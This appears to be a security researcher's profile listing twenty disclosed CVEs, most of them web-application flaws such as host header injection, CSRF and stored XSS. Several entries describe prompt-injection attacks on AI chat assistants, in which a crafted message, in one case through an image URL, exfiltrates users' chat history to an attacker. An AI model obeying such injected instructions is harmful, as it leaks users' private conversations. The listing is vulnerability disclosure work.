Sourajeet Majumder

20 exploits Active since Aug 2024
CVE-2024-48139 WRITEUP HIGH WRITEUP
Blackbox AI <1.3.95 - Info Disclosure
A prompt injection vulnerability in the chatbox of Blackbox AI v1.3.95 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 7.5
CVE-2024-42914 WRITEUP CRITICAL WRITEUP
ArrowCMS 1.0.0 - Host Header Injection
A host header injection vulnerability exists in the forgot password functionality of ArrowCMS version 1.0.0. By sending a specially crafted host header in the forgot password request, it is possible to send password reset links to users which, once clicked, lead to an attacker-controlled server and thus leak the password reset token. This may allow an attacker to reset other users' passwords.
CVSS 9.1
CVE-2024-42915 WRITEUP HIGH WRITEUP
Staff Appraisal System v1.0 - Host Header Injection
A host header injection vulnerability in Staff Appraisal System v1.0 allows attackers to obtain the password reset token via user interaction with a crafted password reset link. This will allow attackers to arbitrarily reset other users' passwords and compromise their accounts.
CVSS 8.0
CVE-2024-45979 WRITEUP HIGH WRITEUP
Lines Police CAD 1.0 - Host Header Injection
A host header injection vulnerability in Lines Police CAD 1.0 allows attackers to obtain the password reset token via user interaction with a crafted password reset link. This allows attackers to arbitrarily reset other users' passwords and compromise their accounts.
CVSS 8.8
CVE-2024-45980 WRITEUP HIGH WRITEUP
MEANStore 1.0 - Host Header Injection
A host header injection vulnerability in MEANStore 1.0 allows attackers to obtain the password reset token via user interaction with a crafted password reset link. This allows attackers to arbitrarily reset other users' passwords and compromise their accounts.
CVSS 8.8
CVE-2024-45981 WRITEUP HIGH WRITEUP
BookReviewLibrary 1.0 - Host Header Injection via Password Reset Link
A host header injection vulnerability in BookReviewLibrary 1.0 allows attackers to obtain the password reset token via user interaction with a crafted password reset link.
CVSS 8.8
CVE-2024-45982 WRITEUP HIGH WRITEUP
scheduleR <0.0.18 - Host Header Injection
A host header injection vulnerability in scheduleR v0.0.18 allows attackers to obtain the password reset token via user interaction with a crafted password reset link. This allows attackers to arbitrarily reset other users' passwords and compromise their accounts.
CVSS 8.8
CVE-2024-45983 WRITEUP MEDIUM WRITEUP
kishan0725 Hospital Management System 6.3.5 - Cross-Site Request Forgery via Doctor Record Deletion
A Cross-Site Request Forgery (CSRF) vulnerability exists in kishan0725's Hospital Management System version 6.3.5. The vulnerability allows an attacker to craft a malicious HTML form that submits a request to delete a doctor record. By enticing an authenticated admin user to visit the specially crafted web page, the attacker can leverage the victim's browser to make unauthorized requests to the vulnerable endpoint, effectively allowing the attacker to perform actions on behalf of the admin without their consent.
CVSS 6.3
CVE-2024-45984 WRITEUP MEDIUM WRITEUP
Blood Bank And Donation Management System 1.0 - Stored Cross-Site Scripting in add_donor.php
A Cross Site Scripting (XSS) vulnerability in add_donor.php of Blood Bank And Donation Management System 1.0 allows an attacker to inject malicious scripts that will be executed when the Donor List is viewed.
CVSS 4.7
CVE-2024-45985 WRITEUP MEDIUM WRITEUP
Blood Bank and Donation Management System 1.0 - Cross-Site Scripting via update_contact.php Name Parameter
A Cross Site Scripting (XSS) vulnerability in update_contact.php of Blood Bank and Donation Management System v1.0 allows an attacker to inject malicious scripts via the name parameter of the update_contact.php
CVSS 4.7
CVE-2024-45986 WRITEUP MEDIUM WRITEUP
Projectworld Online Voting System 1.0 - Stored Cross-Site Scripting in Voter and Profile Pages
A stored Cross-Site Scripting (XSS) vulnerability was identified in Projectworld Online Voting System 1.0 that occurs when an account is registered with a malicious javascript payload. The payload is stored and subsequently executed in the voter.php and profile.php pages whenever the account information is accessed.
CVSS 5.4
CVE-2024-45987 WRITEUP MEDIUM WRITEUP
Projectworld Online Voting System 1.0 - Cross-Site Request Forgery via voter.php
Projectworld Online Voting System Version 1.0 is vulnerable to Cross Site Request Forgery (CSRF) via voter.php. This vulnerability allows an attacker to craft a malicious link that, when clicked by an authenticated user, automatically submits a vote for a specified party without the user's consent or knowledge. The attack leverages the user's active session to perform the unauthorized action, compromising the integrity of the voting process.
CVSS 6.5
CVE-2024-45989 WRITEUP MEDIUM WRITEUP
Monica AI Assistant desktop app <2.3.0 - Info Disclosure
Monica AI Assistant desktop application v2.3.0 is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor. A prompt injection allows an attacker to modify chatbot answer with an unloaded image that exfiltrates the user's sensitive chat data of the current session to a malicious third-party or attacker-controlled server.
CVSS 4.0
CVE-2024-48140 WRITEUP HIGH WRITEUP
Monica Your AI Copilot <6.3.0 - Code Injection
A prompt injection vulnerability in the chatbox of Butterfly Effect Limited Monica Your AI Copilot powered by ChatGPT4 v6.3.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 7.5
CVE-2024-48141 WRITEUP HIGH WRITEUP
Zhipu AI CodeGeeX <2.17.0 - Info Disclosure
A prompt injection vulnerability in the chatbox of Zhipu AI CodeGeeX v2.17.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 7.5
CVE-2024-48142 WRITEUP HIGH WRITEUP
Monica ChatGPT AI Assistant <2.4.0 - Code Injection
A prompt injection vulnerability in the chatbox of Butterfly Effect Limited Monica ChatGPT AI Assistant v2.4.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 7.5
CVE-2024-48143 WRITEUP CRITICAL WRITEUP
Digitory Multi Channel Integrated POS v1.0 - Info Disclosure
A lack of rate limiting in the OTP validation component of Digitory Multi Channel Integrated POS v1.0 allows attackers to gain access to the ordering system and place an excessive amount of food orders.
CVSS 9.1
CVE-2024-48144 WRITEUP CRITICAL WRITEUP
Fusion Chat Chat AI Assistant Ask Me Anything <1.2.4.0 - Info Discl...
A prompt injection vulnerability in the chatbox of Fusion Chat Chat AI Assistant Ask Me Anything v1.2.4.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 9.1
CVE-2024-48145 WRITEUP CRITICAL WRITEUP
ChatNet AI v1.0 - Prompt Injection via Crafted Message
A prompt injection vulnerability in the chatbox of Netangular Technologies ChatNet AI Version v1.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 9.1
CVE-2024-55272 WRITEUP HIGH WRITEUP
Brainasoft Braina <2.8 - Info Disclosure
An issue in Brainasoft Braina v2.8 allows a remote attacker to obtain sensitive information via the chat window function.
CVSS 7.5